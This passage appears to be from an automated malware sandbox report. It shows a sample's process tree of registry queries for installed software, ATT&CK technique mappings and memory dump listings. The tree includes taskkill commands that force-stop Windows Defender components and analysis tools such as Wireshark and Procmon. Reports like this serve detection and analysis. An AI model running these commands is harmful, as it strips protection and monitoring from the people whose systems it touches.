    PID:4184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:4204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:3988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:2172
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4340
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4452
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4712
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4616
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:3756
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4392
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1460
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4208
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4360
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:1488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4392
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5096
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:5036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4192
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:4424
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4580
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:3760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:1608
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:1460
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4192
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4452
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4476
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:1540
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:1608
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4260
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4360
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:380
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3760
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:5012
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:380

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1112-109-0x00000237AE070000-0x00000237AE071000-memory.dmp

Filesize
4KB

Download
memory/1112-76-0x00007FF96C560000-0x00007FF96CF4C000-memory.dmp

Filesize
9.9MB

Download
memory/1112-94-0x00000237AD520000-0x00000237AD521000-memory.dmp

Filesize
4KB

Download
memory/3288-65-0x000000001B150000-0x000000001B154000-memory.dmp

Filesize
16KB

Download